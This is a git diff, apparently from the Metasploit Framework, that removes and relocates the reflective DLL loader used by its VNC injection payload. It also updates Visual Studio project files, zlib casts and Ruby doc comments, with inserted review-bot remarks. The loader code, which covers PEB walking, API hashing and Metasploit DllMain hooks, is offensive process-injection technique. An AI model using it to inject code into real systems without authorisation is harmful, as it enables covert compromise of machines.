REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// 
diff --git a/external/source/vncdll/winvnc/ReflectiveLoader.h b/external/source/vncdll/winvnc/ReflectiveLoader.h deleted file mode 100644 index 224fa0eb68..0000000000 --- a/external/source/vncdll/winvnc/ReflectiveLoader.h +++ /dev/null 
@@ -1,197 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H -#define _VNCDLL_LOADER_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - - - -__forceinline DWORD hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 
- LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD 
dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/winvnc/VSocket.cpp b/external/source/vncdll/winvnc/VSocket.cpp old mode 100644 new mode 100755 index d9906fd03e..43df3023d0 --- a/external/source/vncdll/winvnc/VSocket.cpp +++ b/external/source/vncdll/winvnc/VSocket.cpp @@ -70,7 +70,7 @@ class VSocket; //////////////////////////////////////////////////////// // *** Lovely hacks to make Win32 work. Hurrah! -#ifdef __WIN32__ +#if defined(__WIN32__) && !defined(EWOULDBLOCK) #define EWOULDBLOCK WSAEWOULDBLOCK #endif 
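Review bot: The new `!defined(EWOULDBLOCK)` guard in VSocket.cpp can leave `EWOULDBLOCK` at the CRT's `<errno.h>` value instead of `WSAEWOULDBLOCK`. Recent MSVC toolsets (the new project file selects `v120_xp`) define the POSIX errno names themselves, so the `#define` is skipped whenever `<errno.h>` has been included first. If the socket code further down compares a Winsock error against `EWOULDBLOCK` (not visible in this hunk), a would-block result on a non-blocking socket would then be handled as a hard failure. Forcing the mapping keeps the old behaviour without the redefinition warning: `#undef EWOULDBLOCK` followed by `#define EWOULDBLOCK WSAEWOULDBLOCK` inside the original `#ifdef __WIN32__`.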
diff --git a/external/source/vncdll/winvnc/WinVNC.vcproj b/external/source/vncdll/winvnc/WinVNC.vcproj deleted file mode 100644 index 4fea3fe033..0000000000 --- a/external/source/vncdll/winvnc/WinVNC.vcproj +++ /dev/null @@ -1,1200 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/external/source/vncdll/winvnc/WinVNC.vcxproj b/external/source/vncdll/winvnc/WinVNC.vcxproj new file mode 100755 index 0000000000..37efead766 --- /dev/null +++ b/external/source/vncdll/winvnc/WinVNC.vcxproj 
@@ -0,0 +1,473 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + Release + Win32 + + + Release + x64 + + + + winvnc + {EA6A09AC-04BB-423D-8842-CA48DF901058} + WinVNC + . + + + + DynamicLibrary + v120_xp + false + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + + + + + + + + + + + + + + + + + + + + + + + <_ProjectFileVersion>12.0.21005.1 + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + false + false + false + $(ProjectName).$(PlatformShortName) + .dll + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + false + false + false + $(ProjectName).$(PlatformShortName) + .dll + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + true + $(ProjectName).$(PlatformShortName) + .dll + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + true + $(ProjectName).$(PlatformShortName) + .dll + + + + NDEBUG;%(PreprocessorDefinitions) + true + true + Win32 + + + OnlyExplicitInline + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions) + true + MultiThreaded + false + true + + true + Level3 + true + Default + + + NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0409 + + + + + + /MACHINE:I386 %(AdditionalOptions) + ws2_32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + true + type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies) + true + Windows + true + true + false + false + MachineX86 + + + editbin.exe /NOLOGO 
/OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + NDEBUG;%(PreprocessorDefinitions) + true + true + X64 + false + + + + + OnlyExplicitInline + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions) + true + MultiThreaded + false + true + + true + Level3 + true + Default + + + NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0409 + + + + + + ws2_32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + false + + false + Windows + true + true + + + NotSet + true + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + _DEBUG;%(PreprocessorDefinitions) + true + true + Win32 + + + Disabled + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + StackFrameRuntimeCheck + MultiThreadedDebug + true + + Level3 + true + ProgramDatabase + Default + + + _DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0809 + + + /MACHINE:I386 %(AdditionalOptions) + ws2_32.lib;%(AdditionalDependencies) + true + type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies) + true + Windows + false + + MachineX86 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + _DEBUG;%(PreprocessorDefinitions) + true + true + X64 + + + Disabled + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + 
WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions) + StackFrameRuntimeCheck + MultiThreadedDebug + true + + Level3 + true + ProgramDatabase + Default + + + _DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0809 + + + /MACHINE:I386 %(AdditionalOptions) + ws2_32.lib;%(AdditionalDependencies) + true + type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies) + true + Windows + false + + MachineX64 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + true + true + true + true + + + true + true + true + true + + + true + true + true + true + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/external/source/vncdll/winvnc/WinVNC.vcxproj.filters b/external/source/vncdll/winvnc/WinVNC.vcxproj.filters new file mode 100755 index 0000000000..39f04fd58a --- /dev/null +++ b/external/source/vncdll/winvnc/WinVNC.vcxproj.filters 
@@ -0,0 +1,527 @@ + + + + + {804c711f-35c6-4aac-9b8a-9cf8b528de85} + .cpp, .c + + + {7847cf33-fe03-48ad-9a94-a8956821f343} + .cpp, .c + + + {a328f948-40d7-4548-9451-66b620124477} + + + {cb642898-1056-43ee-828a-40004b207331} + + + {22b4b748-5baf-4a41-9ab0-ef1d45f215aa} + + + {2a00b2f1-2b80-496f-ade2-3ac76578d435} + + + {c3a89192-29f8-4ebc-b443-1032d86966d6} + .h + + + {a545ae04-19cc-401a-bb0e-fd3d7aad0f60} + + + {525d33a4-2360-47f9-9e68-24f7d54d50cb} + + + {e0e45b7e-7137-4fa7-acb3-9c57acce4c9c} + + + + + Source Files + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\omnithread + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source 
Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + + + Source Files\omnithread + + + Source Files\omnithread + + + Header Files + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header 
Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + + + Header Files\winvnc + + + \ No newline at end of file diff --git a/external/source/vncdll/winvnc/vncDesktop.cpp b/external/source/vncdll/winvnc/vncDesktop.cpp old mode 100644 new mode 100755 index 19a2b555c6..396163756e --- a/external/source/vncdll/winvnc/vncDesktop.cpp +++ b/external/source/vncdll/winvnc/vncDesktop.cpp @@ -2906,7 +2906,7 @@ bool bDbgBmDump( TCHAR szFileName[MAX_PATH]; sprintf( szFileName, - "%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp", + "%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp", stm.wYear, stm.wMonth, stm.wDay, stm.wHour, stm.wMinute, stm.wSecond, ptr); diff --git a/external/source/vncdll/winvnc/vncdll.cpp b/external/source/vncdll/winvnc/vncdll.cpp old mode 100644 new mode 100755 index e8bc8dcc93..096c2a03cd --- a/external/source/vncdll/winvnc/vncdll.cpp +++ b/external/source/vncdll/winvnc/vncdll.cpp @@ -15,7 +15,7 @@ */ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" HANDLE hMessageMutex = NULL; diff --git a/external/source/vncdll/winvnc/zlib/inffast.c b/external/source/vncdll/winvnc/zlib/inffast.c old mode 100644 new mode 100755 index aa7f1d4d2a..90455987cb --- a/external/source/vncdll/winvnc/zlib/inffast.c 
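Review bot: The `%08p` conversion in the `sprintf` call of `bDbgBmDump` combines the `0` flag with `%p`, which the C standard leaves undefined, and the call still writes into `TCHAR szFileName[MAX_PATH]` with no length bound. MSVC's `%p` already prints the pointer zero-padded to its full width (8 hex digits on x86, 16 on x64), so plain `%p` is enough: `"%04u.%02u.%02u-%02u-%02u-%02u-0x%p.bmp"`. A bounded call such as `_snprintf( szFileName, MAX_PATH, ... )` with explicit termination would keep the buffer safe if the format ever grows. `sprintf` on a `TCHAR` buffer also only compiles in the MultiByte configuration. The body of `bDbgBmDump` starts and ends outside the hunk.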
+++ b/external/source/vncdll/winvnc/zlib/inffast.c @@ -99,7 +99,7 @@ z_streamp z; do { r += s->end - s->window; /* force pointer in window */ } while (r < s->window); /* covers invalid distances */ - e = s->end - r; + e = (uInt)(s->end - r); if (c > e) { c -= e; /* wrapped copy */ diff --git a/external/source/vncdll/winvnc/zlib/inflate.c b/external/source/vncdll/winvnc/zlib/inflate.c old mode 100644 new mode 100755 index dfb2e867d8..ea6e9c8333 --- a/external/source/vncdll/winvnc/zlib/inflate.c +++ b/external/source/vncdll/winvnc/zlib/inflate.c @@ -334,7 +334,7 @@ z_streamp z; } /* restore */ - z->total_in += p - z->next_in; + z->total_in += (uLong)(p - z->next_in); z->next_in = p; z->avail_in = n; z->state->sub.marker = m; diff --git a/external/source/vncdll/winvnc/zlib/infutil.h b/external/source/vncdll/winvnc/zlib/infutil.h old mode 100644 new mode 100755 index 4401df82fc..1804eb984f --- a/external/source/vncdll/winvnc/zlib/infutil.h +++ b/external/source/vncdll/winvnc/zlib/infutil.h @@ -64,7 +64,7 @@ struct inflate_blocks_state { /* defines for inflate input/output */ /* update pointers and return */ #define UPDBITS {s->bitb=b;s->bitk=k;} -#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;} +#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;} #define UPDOUT {s->write=q;} #define UPDATE {UPDBITS UPDIN UPDOUT} #define LEAVE {UPDATE return inflate_flush(s,z,r);} diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 951c556adc..b5a8b2f40f 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb 
@@ -3,22 +3,16 @@ require 'fileutils' module Msf -### -# # This class wraps interaction with global configuration that can be used as a # persistent storage point for configuration, logs, and other such fun things. -# -### class Config < Hash - # - # The installation root directory for the distribution - # + # The installation's root directory for the distribution InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..')) - # # Determines the base configuration directory. # + # @return [String] the base configuration directory def self.get_config_root # Use MSFCFGDIR environment variable first. See feature request #5797 @@ -47,7 +41,11 @@ class Config < Hash # # Default values # + + # Default system file separator. FileSep = File::SEPARATOR + + # Default configuration locations. Defaults = { 'ConfigDirectory' => get_config_root, 
@@ -68,247 +66,260 @@ class Config < Hash # ## - # # Returns the framework installation root. # + # @return [String] the framework installation root {InstallRoot}. def self.install_root InstallRoot end + # Returns the configuration directory default. # - # Calls the instance method. - # + # @return [String] the root configuration directory. def self.config_directory self.new.config_directory end + # Returns the global module directory. # - # Calls the instance method. - # + # @return [String] path to global module directory. def self.module_directory self.new.module_directory end + # Returns the path that scripts can be loaded from. # - # Calls the instance method. - # + # @return [String] path to script directory. def self.script_directory self.new.script_directory end + # Returns the directory that log files should be stored in. # - # Calls the instance method. - # + # @return [String] path to log directory. def self.log_directory self.new.log_directory end + # Returns the directory that plugins are stored in. # - # Calls the instance method. - # + # @return [String] path to plugin directory. def self.plugin_directory self.new.plugin_directory end + # Returns the user-specific plugin base path # - # Calls the instance method. - # + # @return [String] path to user-specific plugin directory. def self.user_plugin_directory self.new.user_plugin_directory end + # Returns the directory in which session log files are to reside. # - # Calls the instance method. - # + # @return [String] path to session log directory. def self.session_log_directory self.new.session_log_directory end + # Returns the directory in which captured data will reside. # - # Calls the instance method. - # + # @return [String] path to loot directory. def self.loot_directory self.new.loot_directory end + # Returns the directory in which locally-generated data will reside. # - # Calls the instance method. - # + # @return [String] path to locally-generated data directory. 
def self.local_directory self.new.local_directory end + # Returns the user-specific module base path # - # Calls the instance method. - # + # @return [String] path to user-specific modules directory. def self.user_module_directory self.new.user_module_directory end + # Returns the user-specific script base path # - # Calls the instance method. - # + # @return [String] path to user-specific script directory. def self.user_script_directory self.new.user_script_directory end + # Returns the data directory # - # Calls the instance method. - # + # @return [String] path to data directory. def self.data_directory self.new.data_directory end + # Returns the full path to the configuration file. # - # Calls the instance method. - # + # @return [String] path to the configuration file. def self.config_file self.new.config_file end + # Returns the full path to the history file. # - # Calls the instance method. - # + # @return [String] path the history file. def self.history_file self.new.history_file end + # Initializes configuration, creating directories as necessary. # - # Calls the instance method. - # + # @return [void] def self.init self.new.init end + # Loads configuration from the supplied file path, or the default one if + # none is specified. # - # Calls the instance method. - # + # @param path [String] the path to the configuration file. + # @return [Rex::Parser::Ini] INI file parser. def self.load(path = nil) self.new.load(path) end + # Saves configuration to the path specified in the ConfigFile hash key or + # the default path if one isn't specified. The options should be group + # references that have named value pairs. # - # Calls the instance method. - # + # @param opts [Hash] Hash containing configuration options. + # @option opts 'ConfigFile' [Hash] configuration file these options apply + # to. 
